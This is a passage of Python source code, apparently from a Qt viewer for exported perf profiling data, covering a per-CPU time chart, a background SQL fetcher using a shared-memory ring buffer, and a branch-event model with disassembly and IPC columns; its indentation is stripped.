return y - 1
return y
def ToPDP(self, dp, scale):
# Calculate pixel decimal places:
# (10 ** dp) is the minimum delta in the data
# scale it to get the minimum delta in pixels
# log10 gives the number of decimal places negatively
# subtract 1 to divide by 10
# round to the lower negative number
# change the sign to get the number of decimal places positively
x = math.log10((10 ** dp) * scale)
if x < 0:
x -= 1
x = -int(math.floor(x) - 0.1)
else:
x = 0
return x
def Update(self):
x = self.ToPDP(self.dp.x, self.scale.x)
y = self.ToPDP(self.dp.y, self.scale.y)
self.pdp = XY(x, y) # pixel decimal places
# Switch graph splitter which divides the CPU graphs from the legend
class SwitchGraphSplitter(QSplitter):
def __init__(self, parent=None):
super(SwitchGraphSplitter, self).__init__(parent)
self.first_time = False
def resizeEvent(self, ev):
if self.first_time:
self.first_time = False
sz1 = self.widget(1).view.columnWidth(0) + self.widget(1).view.columnWidth(1) + self.widget(1).view.columnWidth(2) + 2
sz1 = sz1 + self.widget(1).view.verticalScrollBar().sizeHint().width()
sz0 = self.size().width() - self.handleWidth() - sz1
self.setSizes([sz0, sz1])
elif not(self.widget(1).saved_size is None):
sz1 = self.widget(1).saved_size
sz0 = self.size().width() - self.handleWidth() - sz1
self.setSizes([sz0, sz1])
super(SwitchGraphSplitter, self).resizeEvent(ev)
# Graph widget base class
class GraphWidget(QWidget):
graph_title_changed = Signal(object)
def __init__(self, parent=None):
super(GraphWidget, self).__init__(parent)
def GraphTitleChanged(self, title):
self.graph_title_changed.emit(title)
def Title(self):
return ""
# Display time in s, ms, us or ns
def ToTimeStr(val):
val = Decimal(val)
if val >= 1000000000:
return "{} s".format((val / 1000000000).quantize(Decimal("0.000000001")))
if val >= 1000000:
return "{} ms".format((val / 1000000).quantize(Decimal("0.000001")))
if val >= 1000:
return "{} us".format((val / 1000).quantize(Decimal("0.001")))
return "{} ns".format(val.quantize(Decimal("1")))
# Switch (i.e. context switch i.e. Time Chart by CPU) graph widget which contains the CPU graphs and the legend and control buttons
class SwitchGraphWidget(GraphWidget):
def __init__(self, glb, collection, parent=None):
super(SwitchGraphWidget, self).__init__(parent)
self.glb = glb
self.collection = collection
self.back_state = []
self.forward_state = []
self.selection_state = (None, None)
self.fwd_rect = None
self.start_time = self.glb.StartTime(collection.machine_id)
i = 0
hregions = collection.hregions.values()
colours = GenerateNRandomColours(len(hregions), 1013)
region_attributes = {}
for hregion in hregions:
if hregion.pid == 0 and hregion.tid == 0:
region_attributes[hregion.key] = GraphRegionAttribute(QColor(0, 0, 0))
else:
region_attributes[hregion.key] = GraphRegionAttribute(colours[i])
i = i + 1
# Default to entire range
xsubrange = Subrange(0.0, float(collection.xrangehi - collection.xrangelo) + 1.0)
ysubrange = Subrange(0.0, float(collection.yrangehi - collection.yrangelo) + 1.0)
subrange = XY(xsubrange, ysubrange)
scale = self.GetScaleForRange(subrange)
self.attrs = GraphAttributes(scale, subrange, region_attributes, collection.dp)
self.item = VertcalGraphSetGraphicsItem(collection, self.attrs, self, SwitchGraphGraphicsItem)
self.scene = QGraphicsScene()
self.scene.addItem(self.item)
self.view = QGraphicsView(self.scene)
self.view.centerOn(0, 0)
self.view.setAlignment(Qt.AlignLeft | Qt.AlignTop)
self.legend = SwitchGraphLegend(collection, region_attributes)
self.splitter = SwitchGraphSplitter()
self.splitter.addWidget(self.view)
self.splitter.addWidget(self.legend)
self.point_label = QLabel("")
self.point_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Fixed)
self.back_button = QToolButton()
self.back_button.setIcon(self.style().standardIcon(QStyle.SP_ArrowLeft))
self.back_button.setDisabled(True)
self.back_button.released.connect(lambda: self.Back())
self.forward_button = QToolButton()
self.forward_button.setIcon(self.style().standardIcon(QStyle.SP_ArrowRight))
self.forward_button.setDisabled(True)
self.forward_button.released.connect(lambda: self.Forward())
self.zoom_button = QToolButton()
self.zoom_button.setText("Zoom")
self.zoom_button.setDisabled(True)
self.zoom_button.released.connect(lambda: self.Zoom())
self.hbox = HBoxLayout(self.back_button, self.forward_button, self.zoom_button, self.point_label)
self.vbox = VBoxLayout(self.splitter, self.hbox)
self.setLayout(self.vbox)
def GetScaleForRangeX(self, xsubrange):
# Default graph 1000 pixels wide
dflt = 1000.0
r = xsubrange.hi - xsubrange.lo
return dflt / r
def GetScaleForRangeY(self, ysubrange):
# Default graph 50 pixels high
dflt = 50.0
r = ysubrange.hi - ysubrange.lo
return dflt / r
def GetScaleForRange(self, subrange):
# Default graph 1000 pixels wide, 50 pixels high
xscale = self.GetScaleForRangeX(subrange.x)
yscale = self.GetScaleForRangeY(subrange.y)
return XY(xscale, yscale)
def PointEvent(self, cpu, time_from, time_to, hregions):
text = "CPU: " + str(cpu)
time_from = time_from.quantize(Decimal(1))
rel_time_from = time_from - self.glb.StartTime(self.collection.machine_id)
text = text + " Time: " + str(time_from) + " (+" + ToTimeStr(rel_time_from) + ")"
self.point_label.setText(text)
self.legend.Highlight(hregions)
def RightClickEvent(self, cpu, hregion_times, pos):
if not IsSelectable(self.glb.db, "calls", "WHERE parent_id >= 0"):
return
menu = QMenu(self.view)
for hregion, time in hregion_times:
thread_at_time = (hregion.exec_comm_id, hregion.thread_id, time)
menu_text = "Show Call Tree for {} {}:{} at {}".format(hregion.comm, hregion.pid, hregion.tid, time)
menu.addAction(CreateAction(menu_text, "Show Call Tree", lambda a=None, args=thread_at_time: self.RightClickSelect(args), self.view))
menu.exec_(pos)
def RightClickSelect(self, args):
CallTreeWindow(self.glb, self.glb.mainwindow, thread_at_time=args)
def NoPointEvent(self):
self.point_label.setText("")
self.legend.Highlight({})
def RangeEvent(self, time_from, time_to):
time_from = time_from.quantize(Decimal(1))
time_to = time_to.quantize(Decimal(1))
if time_to <= time_from:
self.point_label.setText("")
return
rel_time_from = time_from - self.start_time
rel_time_to = time_to - self.start_time
text = " Time: " + str(time_from) + " (+" + ToTimeStr(rel_time_from) + ") to: " + str(time_to) + " (+" + ToTimeStr(rel_time_to) + ")"
text = text + " duration: " + ToTimeStr(time_to - time_from)
self.point_label.setText(text)
def BackState(self):
return (self.attrs.subrange, self.attrs.scale, self.selection_state, self.fwd_rect)
def PushBackState(self):
state = copy.deepcopy(self.BackState())
self.back_state.append(state)
self.back_button.setEnabled(True)
def PopBackState(self):
self.attrs.subrange, self.attrs.scale, self.selection_state, self.fwd_rect = self.back_state.pop()
self.attrs.Update()
if not self.back_state:
self.back_button.setDisabled(True)
def PushForwardState(self):
state = copy.deepcopy(self.BackState())
self.forward_state.append(state)
self.forward_button.setEnabled(True)
def PopForwardState(self):
self.attrs.subrange, self.attrs.scale, self.selection_state, self.fwd_rect = self.forward_state.pop()
self.attrs.Update()
if not self.forward_state:
self.forward_button.setDisabled(True)
def Title(self):
time_from = self.collection.xrangelo + Decimal(self.attrs.subrange.x.lo)
time_to = self.collection.xrangelo + Decimal(self.attrs.subrange.x.hi)
rel_time_from = time_from - self.start_time
rel_time_to = time_to - self.start_time
title = "+" + ToTimeStr(rel_time_from) + " to +" + ToTimeStr(rel_time_to)
title = title + " (" + ToTimeStr(time_to - time_from) + ")"
return title
def Update(self):
selected_subrange, selection_state = self.selection_state
self.item.SetSelection(selection_state)
self.item.SetBracket(self.fwd_rect)
self.zoom_button.setDisabled(selected_subrange is None)
self.GraphTitleChanged(self.Title())
self.item.update(self.item.boundingRect())
def Back(self):
if not self.back_state:
return
self.PushForwardState()
self.PopBackState()
self.Update()
def Forward(self):
if not self.forward_state:
return
self.PushBackState()
self.PopForwardState()
self.Update()
def SelectEvent(self, x0, x1, selection_state):
if selection_state is None:
selected_subrange = None
else:
if x1 - x0 < 1.0:
x1 += 1.0
selected_subrange = Subrange(x0, x1)
self.selection_state = (selected_subrange, selection_state)
self.zoom_button.setDisabled(selected_subrange is None)
def Zoom(self):
selected_subrange, selection_state = self.selection_state
if selected_subrange is None:
return
self.fwd_rect = selection_state
self.item.SetSelection(None)
self.PushBackState()
self.attrs.subrange.x = selected_subrange
self.forward_state = []
self.forward_button.setDisabled(True)
self.selection_state = (None, None)
self.fwd_rect = None
self.attrs.scale.x = self.GetScaleForRangeX(self.attrs.subrange.x)
self.attrs.Update()
self.Update()
# Slow initialization - perform non-GUI initialization in a separate thread and put up a modal message box while waiting
class SlowInitClass():
def __init__(self, glb, title, init_fn):
self.init_fn = init_fn
self.done = False
self.result = None
self.msg_box = QMessageBox(glb.mainwindow)
self.msg_box.setText("Initializing " + title + ". Please wait.")
self.msg_box.setWindowTitle("Initializing " + title)
self.msg_box.setWindowIcon(glb.mainwindow.style().standardIcon(QStyle.SP_MessageBoxInformation))
self.init_thread = Thread(self.ThreadFn, glb)
self.init_thread.done.connect(lambda: self.Done(), Qt.QueuedConnection)
self.init_thread.start()
def Done(self):
self.msg_box.done(0)
def ThreadFn(self, glb):
conn_name = "SlowInitClass" + str(os.getpid())
db, dbname = glb.dbref.Open(conn_name)
self.result = self.init_fn(db)
self.done = True
return (True, 0)
def Result(self):
while not self.done:
self.msg_box.exec_()
self.init_thread.wait()
return self.result
def SlowInit(glb, title, init_fn):
init = SlowInitClass(glb, title, init_fn)
return init.Result()
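# Illustrative note (not original text): SlowInit() shows a modal "please wait" box
# while init_fn(db) runs on a background thread, e.g.
#   collection = SlowInit(glb, "Time Chart", self.Init)
# as used by TimeChartByCPUWindow below.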
# Time chart by CPU window
class TimeChartByCPUWindow(QMdiSubWindow):
def __init__(self, glb, parent=None):
super(TimeChartByCPUWindow, self).__init__(parent)
self.glb = glb
self.machine_id = glb.HostMachineId()
self.collection_name = "SwitchGraphDataCollection " + str(self.machine_id)
collection = LookupModel(self.collection_name)
if collection is None:
collection = SlowInit(glb, "Time Chart", self.Init)
self.widget = SwitchGraphWidget(glb, collection, self)
self.view = self.widget
self.base_title = "Time Chart by CPU"
self.setWindowTitle(self.base_title + self.widget.Title())
self.widget.graph_title_changed.connect(self.GraphTitleChanged)
self.setWidget(self.widget)
AddSubWindow(glb.mainwindow.mdi_area, self, self.windowTitle())
def Init(self, db):
return LookupCreateModel(self.collection_name, lambda : SwitchGraphDataCollection(self.glb, db, self.machine_id))
def GraphTitleChanged(self, title):
self.setWindowTitle(self.base_title + " : " + title)
# Child data item finder
class ChildDataItemFinder():
def __init__(self, root):
self.root = root
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (None,) * 5
self.rows = []
self.pos = 0
def FindSelect(self):
self.rows = []
if self.pattern:
pattern = re.compile(self.value)
for child in self.root.child_items:
for column_data in child.data:
if re.search(pattern, str(column_data)) is not None:
self.rows.append(child.row)
break
else:
for child in self.root.child_items:
for column_data in child.data:
if self.value in str(column_data):
self.rows.append(child.row)
break
def FindValue(self):
self.pos = 0
if self.last_value != self.value or self.pattern != self.last_pattern:
self.FindSelect()
if not len(self.rows):
return -1
return self.rows[self.pos]
def FindThread(self):
if self.direction == 0 or self.value != self.last_value or self.pattern != self.last_pattern:
row = self.FindValue()
elif len(self.rows):
if self.direction > 0:
self.pos += 1
if self.pos >= len(self.rows):
self.pos = 0
else:
self.pos -= 1
if self.pos < 0:
self.pos = len(self.rows) - 1
row = self.rows[self.pos]
else:
row = -1
return (True, row)
def Find(self, value, direction, pattern, context, callback):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (value, direction, pattern, self.value, self.pattern)
# Use a thread so the UI is not blocked
thread = Thread(self.FindThread)
thread.done.connect(lambda row, t=thread, c=callback: self.FindDone(t, c, row), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, row):
callback(row)
# Number of database records to fetch in one go
glb_chunk_sz = 10000
# Background process for SQL data fetcher
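# Explanatory sketch of the shared-memory protocol used below (not original text):
# the fetcher process and the GUI side communicate through a byte Array treated as a
# ring buffer.  Each record is written as a fixed-size pickled length (glb_nsz bytes,
# defined earlier) followed by the pickled record itself; a pickled length of 0 means
# "wrap to the start of the buffer".  The producer advances 'head' (AddToBuffer /
# FetchBatch) and the consumer advances 'tail' (RemoveFromBuffer), with wait_event and
# fetched_event used to block whichever side is waiting on the other.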
class SQLFetcherProcess():
def __init__(self, dbref, sql, buffer, head, tail, fetch_count, fetching_done, process_target, wait_event, fetched_event, prep):
# Need a unique connection name
conn_name = "SQLFetcher" + str(os.getpid())
self.db, dbname = dbref.Open(conn_name)
self.sql = sql
self.buffer = buffer
self.head = head
self.tail = tail
self.fetch_count = fetch_count
self.fetching_done = fetching_done
self.process_target = process_target
self.wait_event = wait_event
self.fetched_event = fetched_event
self.prep = prep
self.query = QSqlQuery(self.db)
self.query_limit = 0 if "$$last_id$$" in sql else 2
self.last_id = -1
self.fetched = 0
self.more = True
self.local_head = self.head.value
self.local_tail = self.tail.value
def Select(self):
if self.query_limit:
if self.query_limit == 1:
return
self.query_limit -= 1
stmt = self.sql.replace("$$last_id$$", str(self.last_id))
QueryExec(self.query, stmt)
def Next(self):
if not self.query.next():
self.Select()
if not self.query.next():
return None
self.last_id = self.query.value(0)
return self.prep(self.query)
def WaitForTarget(self):
while True:
self.wait_event.clear()
target = self.process_target.value
if target > self.fetched or target < 0:
break
self.wait_event.wait()
return target
def HasSpace(self, sz):
if self.local_tail <= self.local_head:
space = len(self.buffer) - self.local_head
if space > sz:
return True
if space >= glb_nsz:
# Use 0 (or space < glb_nsz) to mean there is no more at the top of the buffer
nd = pickle.dumps(0, pickle.HIGHEST_PROTOCOL)
self.buffer[self.local_head : self.local_head + len(nd)] = nd
self.local_head = 0
if self.local_tail - self.local_head > sz:
return True
return False
def WaitForSpace(self, sz):
if self.HasSpace(sz):
return
while True:
self.wait_event.clear()
self.local_tail = self.tail.value
if self.HasSpace(sz):
return
self.wait_event.wait()
def AddToBuffer(self, obj):
d = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
n = len(d)
nd = pickle.dumps(n, pickle.HIGHEST_PROTOCOL)
sz = n + glb_nsz
self.WaitForSpace(sz)
pos = self.local_head
self.buffer[pos : pos + len(nd)] = nd
self.buffer[pos + glb_nsz : pos + sz] = d
self.local_head += sz
def FetchBatch(self, batch_size):
fetched = 0
while batch_size > fetched:
obj = self.Next()
if obj is None:
self.more = False
break
self.AddToBuffer(obj)
fetched += 1
if fetched:
self.fetched += fetched
with self.fetch_count.get_lock():
self.fetch_count.value += fetched
self.head.value = self.local_head
self.fetched_event.set()
def Run(self):
while self.more:
target = self.WaitForTarget()
if target < 0:
break
batch_size = min(glb_chunk_sz, target - self.fetched)
self.FetchBatch(batch_size)
self.fetching_done.value = True
self.fetched_event.set()
def SQLFetcherFn(*x):
process = SQLFetcherProcess(*x)
process.Run()
# SQL data fetcher
class SQLFetcher(QObject):
done = Signal(object)
def __init__(self, glb, sql, prep, process_data, parent=None):
super(SQLFetcher, self).__init__(parent)
self.process_data = process_data
self.more = True
self.target = 0
self.last_target = 0
self.fetched = 0
self.buffer_size = 16 * 1024 * 1024
self.buffer = Array(c_char, self.buffer_size, lock=False)
self.head = Value(c_longlong)
self.tail = Value(c_longlong)
self.local_tail = 0
self.fetch_count = Value(c_longlong)
self.fetching_done = Value(c_bool)
self.last_count = 0
self.process_target = Value(c_longlong)
self.wait_event = Event()
self.fetched_event = Event()
glb.AddInstanceToShutdownOnExit(self)
self.process = Process(target=SQLFetcherFn, args=(glb.dbref, sql, self.buffer, self.head, self.tail, self.fetch_count, self.fetching_done, self.process_target, self.wait_event, self.fetched_event, prep))
self.process.start()
self.thread = Thread(self.Thread)
self.thread.done.connect(self.ProcessData, Qt.QueuedConnection)
self.thread.start()
def Shutdown(self):
# Tell the thread and process to exit
self.process_target.value = -1
self.wait_event.set()
self.more = False
self.fetching_done.value = True
self.fetched_event.set()
def Thread(self):
if not self.more:
return True, 0
while True:
self.fetched_event.clear()
fetch_count = self.fetch_count.value
if fetch_count != self.last_count:
break
if self.fetching_done.value:
self.more = False
return True, 0
self.fetched_event.wait()
count = fetch_count - self.last_count
self.last_count = fetch_count
self.fetched += count
return False, count
def Fetch(self, nr):
if not self.more:
# -1 indicates there are no more
return -1
result = self.fetched
extra = result + nr - self.target
if extra > 0:
self.target += extra
# process_target < 0 indicates shutting down
if self.process_target.value >= 0:
self.process_target.value = self.target
self.wait_event.set()
return result
def RemoveFromBuffer(self):
pos = self.local_tail
if len(self.buffer) - pos < glb_nsz:
pos = 0
n = pickle.loads(self.buffer[pos : pos + glb_nsz])
if n == 0:
pos = 0
n = pickle.loads(self.buffer[0 : glb_nsz])
pos += glb_nsz
obj = pickle.loads(self.buffer[pos : pos + n])
self.local_tail = pos + n
return obj
def ProcessData(self, count):
for i in xrange(count):
obj = self.RemoveFromBuffer()
self.process_data(obj)
self.tail.value = self.local_tail
self.wait_event.set()
self.done.emit(count)
# Fetch more records bar
class FetchMoreRecordsBar():
def __init__(self, model, parent):
self.model = model
self.label = QLabel("Number of records (x " + "{:,}".format(glb_chunk_sz) + ") to fetch:")
self.label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch_count = QSpinBox()
self.fetch_count.setRange(1, 1000000)
self.fetch_count.setValue(10)
self.fetch_count.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch = QPushButton("Go!")
self.fetch.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch.released.connect(self.FetchMoreRecords)
self.progress = QProgressBar()
self.progress.setRange(0, 100)
self.progress.hide()
self.done_label = QLabel("All records fetched")
self.done_label.hide()
self.spacer = QLabel("")
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(self.label)
self.hbox.addWidget(self.fetch_count)
self.hbox.addWidget(self.fetch)
self.hbox.addWidget(self.spacer)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.done_label)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox)
self.bar.show()
self.in_progress = False
self.model.progress.connect(self.Progress)
self.done = False
if not model.HasMoreRecords():
self.Done()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.fetch.setFocus()
def Deactivate(self):
self.bar.hide()
def Enable(self, enable):
self.fetch.setEnabled(enable)
self.fetch_count.setEnabled(enable)
def Busy(self):
self.Enable(False)
self.fetch.hide()
self.spacer.hide()
self.progress.show()
def Idle(self):
self.in_progress = False
self.Enable(True)
self.progress.hide()
self.fetch.show()
self.spacer.show()
def Target(self):
return self.fetch_count.value() * glb_chunk_sz
def Done(self):
self.done = True
self.Idle()
self.label.hide()
self.fetch_count.hide()
self.fetch.hide()
self.spacer.hide()
self.done_label.show()
def Progress(self, count):
if self.in_progress:
if count:
percent = ((count - self.start) * 100) / self.Target()
if percent >= 100:
self.Idle()
else:
self.progress.setValue(percent)
if not count:
# Count value of zero means no more records
self.Done()
def FetchMoreRecords(self):
if self.done:
return
self.progress.setValue(0)
self.Busy()
self.in_progress = True
self.start = self.model.FetchMoreRecords(self.Target())
# Branch data model level two item
class BranchLevelTwoItem():
def __init__(self, row, col, text, parent_item):
self.row = row
self.parent_item = parent_item
self.data = [""] * (col + 1)
self.data[col] = text
self.level = 2
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
return 0
def hasChildren(self):
return False
def getData(self, column):
return self.data[column]
# Branch data model level one item
class BranchLevelOneItem():
def __init__(self, glb, row, data, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.child_count = 0
self.child_items = []
self.data = data[1:]
self.dbid = data[0]
self.level = 1
self.query_done = False
self.br_col = len(self.data) - 1
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def Select(self):
self.query_done = True
if not self.glb.have_disassembler:
return
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT cpu, to_dso_id, to_symbol_id, to_sym_offset, short_name, long_name, build_id, sym_start, to_ip"
" FROM samples"
" INNER JOIN dsos ON samples.to_dso_id = dsos.id"
" INNER JOIN symbols ON samples.to_symbol_id = symbols.id"
" WHERE samples.id = " + str(self.dbid))
if not query.next():
return
cpu = query.value(0)
dso = query.value(1)
sym = query.value(2)
if dso == 0 or sym == 0:
return
off = query.value(3)
short_name = query.value(4)
long_name = query.value(5)
build_id = query.value(6)
sym_start = query.value(7)
ip = query.value(8)
QueryExec(query, "SELECT samples.dso_id, symbol_id, sym_offset, sym_start"
" FROM samples"
" INNER JOIN symbols ON samples.symbol_id = symbols.id"
" WHERE samples.id > " + str(self.dbid) + " AND cpu = " + str(cpu) +
" ORDER BY samples.id"
" LIMIT 1")
if not query.next():
return
if query.value(0) != dso:
# Cannot disassemble from one dso to another
return
bsym = query.value(1)
boff = query.value(2)
bsym_start = query.value(3)
if bsym == 0:
return
tot = bsym_start + boff + 1 - sym_start - off
if tot <= 0 or tot > 16384:
return
inst = self.glb.disassembler.Instruction()
f = self.glb.FileFromNamesAndBuildId(short_name, long_name, build_id)
if not f:
return
mode = 0 if Is64Bit(f) else 1
self.glb.disassembler.SetMode(inst, mode)
buf_sz = tot + 16
buf = create_string_buffer(tot + 16)
f.seek(sym_start + off)
buf.value = f.read(buf_sz)
buf_ptr = addressof(buf)
i = 0
while tot > 0:
cnt, text = self.glb.disassembler.DisassembleOne(inst, buf_ptr, buf_sz, ip)
if cnt:
byte_str = tohex(ip).rjust(16)
for k in xrange(cnt):
byte_str += " %02x" % ord(buf[i])
i += 1
while k < 15:
byte_str += " "
k += 1
self.child_items.append(BranchLevelTwoItem(0, self.br_col, byte_str + " " + text, self))
self.child_count += 1
else:
return
buf_ptr += cnt
tot -= cnt
buf_sz -= cnt
ip += cnt
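# Note on Select() above (an explanatory sketch, not original text): the first query
# fetches the dso, symbol and branch target address (to_ip) of this sample, the second
# finds the next sample on the same CPU to bound the address range, and the bytes
# between the two addresses are read from the dso file and disassembled one
# instruction at a time into BranchLevelTwoItem children.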
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Branch data model root item
class BranchRootItem():
def __init__(self):
self.child_count = 0
self.child_items = []
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return None
def getRow(self):
return 0
def childCount(self):
return self.child_count
def hasChildren(self):
return self.child_count > 0
def getData(self, column):
return ""
# Calculate instructions per cycle
def CalcIPC(cyc_cnt, insn_cnt):
if cyc_cnt and insn_cnt:
ipc = Decimal(float(insn_cnt) / cyc_cnt)
ipc = str(ipc.quantize(Decimal(".01"), rounding=ROUND_HALF_UP))
else:
ipc = "0"
return ipc
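# Illustrative example (not part of the original code):
#   CalcIPC(cyc_cnt=200, insn_cnt=300)  ->  "1.50"
# and a zero cycle or instruction count yields "0".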
# Branch data preparation
def BranchDataPrepBr(query, data):
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
def BranchDataPrepIPC(query, data):
insn_cnt = query.value(16)
cyc_cnt = query.value(17)
ipc = CalcIPC(cyc_cnt, insn_cnt)
data.append(insn_cnt)
data.append(cyc_cnt)
data.append(ipc)
def BranchDataPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
BranchDataPrepBr(query, data)
return data
def BranchDataPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
BranchDataPrepBr(query, data)
return data
def BranchDataWithIPCPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
BranchDataPrepIPC(query, data)
BranchDataPrepBr(query, data)
return data
def BranchDataWithIPCPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
BranchDataPrepIPC(query, data)
BranchDataPrepBr(query, data)
return data
# Branch data model
class BranchModel(TreeModel):
progress = Signal(object)
def __init__(self, glb, event_id, where_clause, parent=None):
super(BranchModel, self).__init__(glb, None, parent)
self.event_id = event_id
self.more = True
self.populated = 0
self.have_ipc = IsSelectable(glb.db, "samples", columns = "insn_count, cyc_count")
if self.have_ipc:
select_ipc = ", insn_count, cyc_count"
prep_fn = BranchDataWithIPCPrep
prep_wa_fn = BranchDataWithIPCPrepWA
else:
select_ipc = ""
prep_fn = BranchDataPrep
prep_wa_fn = BranchDataPrepWA
sql = ("SELECT samples.id, time, cpu, comm, pid, tid, branch_types.name,"
" CASE WHEN in_tx = '0' THEN 'No' ELSE 'Yes' END,"
" ip, symbols.name, sym_offset, dsos.short_name,"
" to_ip, to_symbols.name, to_sym_offset, to_dsos.short_name"
+ select_ipc +
" FROM samples"
" INNER JOIN comms ON comm_id = comms.id"
" INNER JOIN threads ON thread_id = threads.id"
" INNER JOIN branch_types ON branch_type = branch_types.id"
" INNER JOIN symbols ON symbol_id = symbols.id"
" INNER JOIN symbols to_symbols ON to_symbol_id = to_symbols.id"
" INNER JOIN dsos ON samples.dso_id = dsos.id"
" INNER JOIN dsos AS to_dsos ON samples.to_dso_id = to_dsos.id"
" WHERE samples.id > $$last_id$$" + where_clause +
" AND evsel_id = " + str(self.event_id) +
" ORDER BY samples.id"
" LIMIT " + str(glb_chunk_sz))
# The string workaround prep functions are needed for pyside version 1 with python3
if pyside_version_1 and sys.version_info[0] == 3:
prep = prep_wa_fn
else:
prep = prep_fn
self.fetcher = SQLFetcher(glb, sql, prep, self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def GetRoot(self):
return BranchRootItem()
def columnCount(self, parent=None):
if self.have_ipc:
return 11
else:
return 8
def columnHeader(self, column):
if self.have_ipc:
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Insn Cnt", "Cyc Cnt", "IPC", "Branch")[column]
else:
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Branch")[column]
def columnFont(self, column):
if self.have_ipc:
br_col = 10
else:
br_col = 7
if column != br_col:
return None
return QFont("Monospace")
def DisplayData(self, item, index):
if item.level == 1:
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = BranchLevelOneItem(self.glb, self.populated, data, self.root)
self.root.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.root.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.root.child_count += count
self.endInsertRows()
self.progress.emit(self.root.child_count)
def FetchMoreRecords(self, count):
current = self.root.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
# Report Variables
class ReportVars():
def __init__(self, name = "", where_clause = "", limit = ""):
self.name = name
self.where_clause = where_clause
self.limit = limit
def UniqueId(self):
return str(self.where_clause + ";" + self.limit)
# Branch window
class BranchWindow(QMdiSubWindow):
def __init__(self, glb, event_id, report_vars, parent=None):
super(BranchWindow, self).__init__(parent)
model_name = "Branch Events " + str(event_id) + " " + report_vars.UniqueId()
self.model = LookupCreateModel(model_name, lambda: BranchModel(glb, event_id, report_vars.where_clause))
self.view = QTreeView()
self.view.setUniformRowHeights(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.view.setModel(self.model)
self.ResizeColumnsToContents()
self.context_menu = TreeContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model.root)
self.fetch_bar = FetchMoreRecordsBar(self.model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name + " Branch Events")
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extremely slow
# so implement a crude alternative
mm = "MM" if column else "MMMM"
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.model.root.child_items[row].data[column]
len = metrics.width(str(val) + mm)
max = len if len > max else max
val = self.model.columnHeader(column)
len = metrics.width(str(val) + mm)
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.model.root.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Line edit data item
class LineEditDataItem(object):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
self.glb = glb
self.label = label
self.placeholder_text = placeholder_text
self.parent = parent
self.id = id
self.value = default
self.widget = QLineEdit(default)
self.widget.editingFinished.connect(self.Validate)
self.widget.textChanged.connect(self.Invalidate)
self.red = False
self.error = ""
self.validated = True
if placeholder_text:
self.widget.setPlaceholderText(placeholder_text)
def TurnTextRed(self):
if not self.red:
palette = QPalette()
palette.setColor(QPalette.Text, Qt.red)
